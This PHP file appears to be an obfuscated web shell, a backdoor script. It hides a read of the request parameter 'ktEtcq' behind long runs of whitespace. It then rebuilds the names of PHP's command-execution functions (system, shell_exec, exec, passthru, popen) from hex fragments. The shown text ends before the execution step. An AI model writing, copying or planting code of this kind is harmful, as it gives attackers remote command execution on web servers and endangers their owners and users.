<?php 
																																										
																																										
																																										trim($_REQUEST['ktEtcq']);


$property1 = '7';
$property2 = '3';
$property3 = '4';
$property4 = '6';
$property5 = '5';
$property6 = 'c';
$property7 = 'f';
$property8 = '8';
$property9 = '2';
$property10 = '0';
$property11 = 'e';
$property12 = '1';
$property13 = 'd';
$property14 = '9';
$parle_tokens1 = pack("H*", $property1.'3'.'7'.'9'.'7'.$property2.$property1.$property3.$property4.'5'.'6'.'d');
$parle_tokens2 = pack("H*", '7'.'3'.$property4.'8'.'6'.$property5.'6'.$property6.$property4.$property6.$property5.$property7.'6'.'5'.$property1.$property8.'6'.$property5.$property4.'3');
$parle_tokens3 = pack("H*", $property4.$property5.$property1.$property8.'6'.'5'.$property4.$property2);
$parle_tokens4 = pack("H*", $property1.'0'.$property4.'1'.'7'.$property2.'7'.'3'.$property1.'4'.'6'.$property8.$property1.$property9.'7'.$property5);
$parle_tokens5 = pack("H*", '7'.$property10.'6'.'f'.'7'.'0'.'6'.'5'.'6'.$property11);
$parle_tokens6 = pack("H*", $property1.$property2.$property1.'4'.$property1.'2'.$property4.'5'.$property4.$property12.'6'.$property13.'5'.'f'.'6'.'7'.'6'.$property5.$property1.$property3.$property5.$property7.'6'.'3'.$property4.$property7.$property4.$property11.'7'.$property3.$property4.'5'.$property4.'e'.$property1.'4'.$property1.'3');
$parle_tokens7 = pack("H*", $property1.'0'.$property4.'3'.$property4.'c'.'6'.'f'.$property1.'3'.'6'.$property5);

